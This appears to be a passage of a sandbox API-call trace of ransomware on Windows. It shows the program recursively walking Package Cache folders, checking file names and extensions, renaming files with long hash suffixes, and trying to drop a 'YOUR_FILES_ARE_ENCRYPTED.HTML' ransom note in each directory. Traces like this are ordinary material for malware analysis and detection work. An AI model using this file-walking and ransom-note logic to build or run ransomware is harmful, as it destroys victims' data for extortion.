ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafe5885c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafe5d593, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.511] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.512] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0110.512] GetProcessHeap () returned 0x600000 [0110.512] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{7d0b74c2-c3f8-4af1-940f-cd79ab4b2dce}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.512] GetProcessHeap () returned 0x600000 [0110.512] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.512] GetProcessHeap () returned 0x600000 [0110.512] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.513] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c938406, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9496c7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9496c7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", cAlternateFileName="{929FB~1.210")) returned 1 [0110.513] StrStrIW (lpFirst="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.513] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned 86 [0110.513] GetProcessHeap () returned 0x600000 [0110.513] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.514] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" [0110.514] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*" [0110.514] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c938406, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9496c7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaff42c7d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.514] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c938406, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9496c7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaff42c7d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.514] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9496c7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9496c7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="packages", cAlternateFileName="")) returned 1 [0110.515] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.515] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned 95 [0110.515] GetProcessHeap () returned 0x600000 [0110.515] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.515] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" [0110.515] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*" [0110.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9496c7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaff3a3d3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4196, dwReserved1=0x6f40e8, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.515] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9496c7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaff3a3d3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4196, dwReserved1=0x6f40e8, cFileName="..", cAlternateFileName="")) returned 1 [0110.515] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafedd752, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafedd752, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4196, dwReserved1=0x6f40e8, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0110.515] StrStrIW (lpFirst="vcRuntimeAdditional_amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.515] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned 121 [0110.516] GetProcessHeap () returned 0x600000 [0110.516] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.517] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" [0110.517] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*" [0110.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafedd752, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafedd752, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63bad8, dwReserved1=0x6f40f0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.517] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafedd752, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafedd752, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63bad8, dwReserved1=0x6f40f0, cFileName="..", cAlternateFileName="")) returned 1 [0110.517] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec82c300, ftCreationTime.dwHighDateTime=0x1cf3e1d, ftLastAccessTime.dwLowDateTime=0xec82c300, ftLastAccessTime.dwHighDateTime=0x1cf3e1d, ftLastWriteTime.dwLowDateTime=0xb0296c25, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x554520, dwReserved0=0x63bad8, dwReserved1=0x6f40f0, cFileName="cab1.cab.99ED2C9FAC46B8EB309BBBF1C555ED0250F019498554C787404D841E847A154A", cAlternateFileName="CAB1CA~1.99E")) returned 1 [0110.517] StrStrIW (lpFirst="cab1.cab.99ED2C9FAC46B8EB309BBBF1C555ED0250F019498554C787404D841E847A154A", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.517] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.99ED2C9FAC46B8EB309BBBF1C555ED0250F019498554C787404D841E847A154A") returned 195 [0110.517] PathFindExtensionW (pszPath="cab1.cab.99ED2C9FAC46B8EB309BBBF1C555ED0250F019498554C787404D841E847A154A") returned=".99ED2C9FAC46B8EB309BBBF1C555ED0250F019498554C787404D841E847A154A" [0110.517] lstrlenW (lpString=".99ED2C9FAC46B8EB309BBBF1C555ED0250F019498554C787404D841E847A154A") returned 65 [0110.517] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea206900, ftCreationTime.dwHighDateTime=0x1cf3e1d, ftLastAccessTime.dwLowDateTime=0xea206900, ftLastAccessTime.dwHighDateTime=0x1cf3e1d, ftLastWriteTime.dwLowDateTime=0xea206900, ftLastWriteTime.dwHighDateTime=0x1cf3e1d, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x63bad8, dwReserved1=0x6f40f0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0110.517] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.517] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 150 [0110.517] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0110.517] lstrlenW (lpString=".msi") returned 4 [0110.517] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0110.517] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafe75c8e, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafe75c8e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaff355da, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63bad8, dwReserved1=0x6f40f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.517] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafe75c8e, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafe75c8e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaff355da, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63bad8, dwReserved1=0x6f40f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.517] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.517] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 151 [0110.517] GetProcessHeap () returned 0x600000 [0110.517] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.518] GetProcessHeap () returned 0x600000 [0110.518] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.518] GetProcessHeap () returned 0x600000 [0110.518] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.519] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaff3a3d3, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaff3a3d3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaff3de83, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f4196, dwReserved1=0x6f40e8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.519] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaff3a3d3, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaff3a3d3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaff3de83, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f4196, dwReserved1=0x6f40e8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.519] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.519] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0110.519] GetProcessHeap () returned 0x600000 [0110.520] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.520] GetProcessHeap () returned 0x600000 [0110.520] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.520] GetProcessHeap () returned 0x600000 [0110.520] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.521] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaff42c7d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaff42c7d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaff4694c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.521] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaff42c7d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaff42c7d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaff4694c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.521] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.521] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0110.521] GetProcessHeap () returned 0x600000 [0110.521] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.521] GetProcessHeap () returned 0x600000 [0110.521] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.521] GetProcessHeap () returned 0x600000 [0110.521] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.522] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c8dfa73, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c905d7a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c905d7a, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", cAlternateFileName="{A749D~1.210")) returned 1 [0110.522] StrStrIW (lpFirst="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.522] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned 86 [0110.522] GetProcessHeap () returned 0x600000 [0110.522] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.523] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" [0110.523] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*" [0110.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c8dfa73, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c905d7a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaff837ff, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.524] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c8dfa73, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c905d7a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaff837ff, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.524] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c905d7a, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c905d7a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c905d7a, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="packages", cAlternateFileName="")) returned 1 [0110.524] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.524] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned 95 [0110.524] GetProcessHeap () returned 0x600000 [0110.524] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.524] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package 